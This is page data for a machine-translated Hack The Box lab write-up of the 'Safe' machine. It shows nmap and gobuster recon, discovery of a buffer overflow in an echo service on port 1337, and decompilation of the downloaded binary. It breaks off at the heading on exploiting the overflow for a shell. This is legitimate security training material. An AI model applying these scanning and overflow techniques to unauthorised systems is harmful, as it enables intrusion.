{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-safe-en","result":{"data":{"markdownRemark":{"id":"ba79305f-9a57-52b7-8a3d-4ee7d53cbc2d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-safe\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/f406dee62927ba52f8b404d46ba22624/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXklEQVQY0x2PP0/bUADE/S26s9AFFOIAiZ/tPMd/iJ00QTGKCYYEE0GpFEEVaFVCCX+3Tu1QdaoYkbp26Ufol3o/Hgyn051OpzvjZnbGxacTdT07pb+dkfQy2mnGZpaT7gzZKQ6118cOmnjxO9brgeaO1jFOmGjErDoNTCGVBsafxyv19+kb///95nY+pfhwwsfPXzianDKZnjO7vmNv/B4v6ZLmw9fy3mCX4fiQbK8gPziiKsOXQiq2r4z5XYfvP2bq1897HubndPr75MUx3kYX228zGB3TiDpUujlm2GNFtnGCBmcjG1vWCQOXUs3DtBxVqpoY3WxBjScxXy9HjIst/NSlPQiItuo0twWtgcTfdLEiSZDqkrhORTQQ0tNXPdZdqdf5rFgmQf+NMpbKizrwVrlyTQccxIZANC1EZOMmAiexsJs2Nd/BbQnNLmXLoyz0qle8XNW65qjlVZNnaH3AynBxsUEAAAAASUVORK5CYII='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/f406dee62927ba52f8b404d46ba22624/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/f406dee62927ba52f8b404d46ba22624/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/f406dee62927ba52f8b404d46ba22624/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the retired HackTheBox machine “Safe.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#enumeration\">Enumeration</a></p>\n<ul>\n<li><a href=\"#exploiting-bof-to-get-a-shell\">Exploiting BOF to Get a Shell</a></li>\n</ul>\n</li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>Running an Nmap scan reveals that HTTP and SSH are open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Nmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.147<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.24s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">998</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.4p1 Debian <span class=\"token number\">10</span>+deb9u6 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">99</span>:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.25 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.25 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Apache2 Debian Default Page: It works\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">34.89</span> seconds</code></pre></div>\n<p>The gobuster output wasn’t very useful.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster.txt\n\n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span>\n<span class=\"token number\">2022</span>/06/12 01:36:47 Starting gobuster <span class=\"token keyword\">in</span> directory enumeration mode\n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span>\n/manual               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">317</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/manual/<span class=\"token punctuation\">]</span>\n/server-status        <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">403</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">302</span><span class=\"token punctuation\">]</span> \n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span></code></pre></div>\n<p>There might be a domain restriction, but since I don’t know at this point, I’ll change approach and look for Apache vulnerabilities.</p>\n<p>I was stuck, so I also tried scanning all ports and found that port 1337 is open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt\n<span class=\"token number\">1337</span>/tcp <span class=\"token function\">open</span>  waste?\n<span class=\"token operator\">|</span> fingerprint-strings: \n<span class=\"token operator\">|</span>   DNSStatusRequestTCP: \n<span class=\"token operator\">|</span>     05:43:45 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   DNSVersionBindReqTCP: \n<span class=\"token operator\">|</span>     05:43:39 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   GenericLines: \n<span class=\"token operator\">|</span>     05:43:26 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?\n<span class=\"token operator\">|</span>   GetRequest: \n<span class=\"token operator\">|</span>     05:43:33 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? GET / HTTP/1.0\n<span class=\"token operator\">|</span>   HTTPOptions: \n<span class=\"token operator\">|</span>     05:43:33 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? OPTIONS / HTTP/1.0\n<span class=\"token operator\">|</span>   Help: \n<span class=\"token operator\">|</span>     05:43:50 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? HELP\n<span class=\"token operator\">|</span>   NULL: \n<span class=\"token operator\">|</span>     05:43:26 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   RPCCheck: \n<span class=\"token operator\">|</span>     05:43:34 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   RTSPRequest: \n<span class=\"token operator\">|</span>     05:43:34 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? OPTIONS / RTSP/1.0\n<span class=\"token operator\">|</span>   SSLSessionReq: \n<span class=\"token operator\">|</span>     05:43:50 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?\n<span class=\"token operator\">|</span>   TLSSessionReq, TerminalServerCookie: \n<span class=\"token operator\">|</span>     05:43:51 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>_    What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?</code></pre></div>\n<p>Port 1337 has some unknown service running, but connecting with netcat returns <code class=\"language-text\">What do you want me to echo back?</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 657px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/975a6e715e9ab9ed0672188c7275af84/a1253/image-20220612190508371.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAq0lEQVQY03WQawrCMBCEe55WmqTF1ryadxVF73+bMVlEpOCPj50Zkp2QbpIXKF/g9yfS7QWX7/DlgUUbpBKRUkAuiaYPjrT3jnT4wARH3w8YhhO6crti3wtyjij1cIwBKXpsm615htYS67rAOQtjNC3WWlW/0WzLW9485xzdupxJsMo4jmCswcAZp1wI8eXoj9DC1qiUpBdZa6ipNSqlfjILWb9mnie69B+BN57XhUpUnm8iAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/975a6e715e9ab9ed0672188c7275af84/8ac56/image-20220612190508371.webp 240w,\n/static/975a6e715e9ab9ed0672188c7275af84/d3be9/image-20220612190508371.webp 480w,\n/static/975a6e715e9ab9ed0672188c7275af84/b9f96/image-20220612190508371.webp 657w\"\n              sizes=\"(max-width: 657px) 100vw, 657px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/975a6e715e9ab9ed0672188c7275af84/8ff5a/image-20220612190508371.png 240w,\n/static/975a6e715e9ab9ed0672188c7275af84/e85cb/image-20220612190508371.png 480w,\n/static/975a6e715e9ab9ed0672188c7275af84/a1253/image-20220612190508371.png 657w\"\n            sizes=\"(max-width: 657px) 100vw, 657px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/975a6e715e9ab9ed0672188c7275af84/a1253/image-20220612190508371.png\"\n            alt=\"image-20220612190508371\"\n            title=\"image-20220612190508371\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After experimenting, I noticed that inputting 120 bytes (including the newline) causes no response to be returned, indicating a BOF vulnerability.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 799px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3cf0bd21e8489ce90605c69b3ce92526/76cea/image-20220612193635553.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 58.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABc0lEQVQoz31T25aDIAz0g7TVqijiBe/taf//d7KZIJZ29+zDnBCQyUyCUV1XpHVNVaWoaTTleU6Xy4XiOKYkSQRYx3HykSfB+Qnei8ZxoHmeyJiG2tbweqR1nel2u1GapoIsy/5FGqwjqBpHS0qVQlIUOaM4CX28Xq8H0rPQX4imydJ+30SZtYOoG2wvRXxEW5RSEgGvBsU8RCkIn88H7ftK27bQnYlBOHIR7D9fD9rWhZZlpo2/wdnEBVAYQuDOcJtc752TCH3rulaA6rCLwUARBuXzoiilHVCC9oAAwwvtSg+NMVJFa01lWcplRN9Tb7WqKtlDER81KwuHJgpXtgR7d7YEy7DiLqmTHHld16dqD+z9Itx31zsMBk8IfUKP0AJEEOJjvDNYfE/bwRMFlhvq+07Qtq3ErnP5wISS876zrPhi9oEsS4/o8ujFkxyGnuzoLtuDJFy3XBTDAb7f3Vvh8bBhLbTgPwzz8/yLyJOFf80PIbqIGptws0AAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3cf0bd21e8489ce90605c69b3ce92526/8ac56/image-20220612193635553.webp 240w,\n/static/3cf0bd21e8489ce90605c69b3ce92526/d3be9/image-20220612193635553.webp 480w,\n/static/3cf0bd21e8489ce90605c69b3ce92526/a2266/image-20220612193635553.webp 799w\"\n              sizes=\"(max-width: 799px) 100vw, 799px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3cf0bd21e8489ce90605c69b3ce92526/8ff5a/image-20220612193635553.png 240w,\n/static/3cf0bd21e8489ce90605c69b3ce92526/e85cb/image-20220612193635553.png 480w,\n/static/3cf0bd21e8489ce90605c69b3ce92526/76cea/image-20220612193635553.png 799w\"\n            sizes=\"(max-width: 799px) 100vw, 799px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3cf0bd21e8489ce90605c69b3ce92526/76cea/image-20220612193635553.png\"\n            alt=\"image-20220612193635553\"\n            title=\"image-20220612193635553\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, since there’s no response and I can’t identify the binary running in the background, I was stuck.</p>\n<p>I don’t have enough experience to exploit BOF blindly.</p>\n<p>Assuming the machine wouldn’t make you do it blindly, I started looking for a binary. I found on the port 80 top page that a file called <code class=\"language-text\">myapp</code> was available for download.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 717px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ee7891f9e13f11a3560695e1e2b60ff9/0ad97/image-20220612201908834.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABl0lEQVQoz43P2W4SURjA8XkHo1JFCmVpYJDSxa2+bROv1OtSlsYn8MpbSMRh5gyzsM4GM/P3MJYmNSb2S345S863HKVSVcm/KlOtNe+oVKSjcp3ciyL1RpuT03e02m85kc7ffKShnlGuNMgflnn+8vABJZcr8uxpgYODknTEsXpOs/2B4+YFhUqTfKlOsfqaUq1F6+yS5uklavs9uUKNJzLnb8rV1Sc+f/nK9XWHXr9Pb3Cb6fYH8jzI1p1Oty/XW256g0znpv9H9yHF93x2EUYpSSw3KfeRJBBvpZhHh2IYBv5iybfvFj9GNppl8FPoDPUxY9NE2C7a1GLprZh7c8JtJBslskn8T4rjOmzWEc7IxDLGiMkIoU8Ya1N0w8a2XFauYG47mMYCx1yzXkYsFhGzeUQUbEnjJJsuTVMU27aJNzErIScQBq5pIcQSezpnJjQsMZMNZvhrTwqIvA1b+T5J0syuyM59Qcdx8DyP4WiIOZ0ymUzQdZ1fmpZ94bGxL6pYlpUl+r5PFIaEd4IgyO73E/zPvuhv2IBJr+bbXd0AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ee7891f9e13f11a3560695e1e2b60ff9/8ac56/image-20220612201908834.webp 240w,\n/static/ee7891f9e13f11a3560695e1e2b60ff9/d3be9/image-20220612201908834.webp 480w,\n/static/ee7891f9e13f11a3560695e1e2b60ff9/4bde0/image-20220612201908834.webp 717w\"\n              sizes=\"(max-width: 717px) 100vw, 717px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ee7891f9e13f11a3560695e1e2b60ff9/8ff5a/image-20220612201908834.png 240w,\n/static/ee7891f9e13f11a3560695e1e2b60ff9/e85cb/image-20220612201908834.png 480w,\n/static/ee7891f9e13f11a3560695e1e2b60ff9/0ad97/image-20220612201908834.png 717w\"\n            sizes=\"(max-width: 717px) 100vw, 717px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ee7891f9e13f11a3560695e1e2b60ff9/0ad97/image-20220612201908834.png\"\n            alt=\"image-20220612201908834\"\n            title=\"image-20220612201908834\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Decompiling the obtained binary, it looks quite simple.</p>\n<p>It appears to be a program that calls <code class=\"language-text\">uptime</code> on the server side and puts the user’s input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 396px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/90af7737a33332fa7b5d65f6ebfa20c1/db910/image-20220612222939668.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 64.16666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB3klEQVQ4y5WSS2/TUBCF8xOBgFARIahCLRLq72HBgmVUp01qWv4BYgeoxAU1La0ilbz8it+O7euPsaMUFqhqRjo6d0a+Z2Z8buNBU+dh85Dm4wNarR6Pmhov2lXe4Xmrz+7rE9ovdZ481djaEjzTJO/Sbutsv9LZ2RHs6rzZ09kTNN6//Uzn3Se07oBeb8D+/im9/nfhb8IGJx9/1tyRuqYJuqccHFYw6vrRkUFfN/hwbHAsaBRLj3ARsojBE1Ts+5AkEIYVF2wSDdO0cbyUKFEEUSFQtWAoHAaKJFYopSiK+6Fh2Ta+55FmkOe5XI5RZSzniEQQZxFlWd4bDVsE02XO3C2I04Q0mbJMpBa7WKGN5Vu365TcLVav7LouaZrjLWA8hiBOWGQeduriCpzUYRpNpR5UindGPaHj2ARBxvACjEHBTPKv5hfOTINr75pz55yhO+TSvmTsj7ESCzM2uQlumEUzrrwr/MQX85LVhJZtrQSHMJnI2b/AD0fM5kOWWYZYUncuyoJc5RSqqJGprM4rrvLKuJXL1lyeh+LsB4xGPrb3iyj6jeeNa5M2iXrluWnKhBGOo5BtCZaRdC7+2rCBw/WEk8mUOI5vBf7ttv5ozfd62Ouf+b9umwit4w8bn8ubyDZl8gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/90af7737a33332fa7b5d65f6ebfa20c1/8ac56/image-20220612222939668.webp 240w,\n/static/90af7737a33332fa7b5d65f6ebfa20c1/2a0bc/image-20220612222939668.webp 396w\"\n              sizes=\"(max-width: 396px) 100vw, 396px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/90af7737a33332fa7b5d65f6ebfa20c1/8ff5a/image-20220612222939668.png 240w,\n/static/90af7737a33332fa7b5d65f6ebfa20c1/db910/image-20220612222939668.png 396w\"\n            sizes=\"(max-width: 396px) 100vw, 396px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/90af7737a33332fa7b5d65f6ebfa20c1/db910/image-20220612222939668.png\"\n            alt=\"image-20220612222939668\"\n            title=\"image-20220612222939668\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>For a simple BOF like this, it seems I can just call the address of <code class=\"language-text\">/bin/sh</code>.</p>\n<h3 id=\"exploiting-bof-to-get-a-shell\" style=\"position:relative;\"><a href=\"#exploiting-bof-to-get-a-shell\" aria-label=\"exploiting bof to get a shell permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 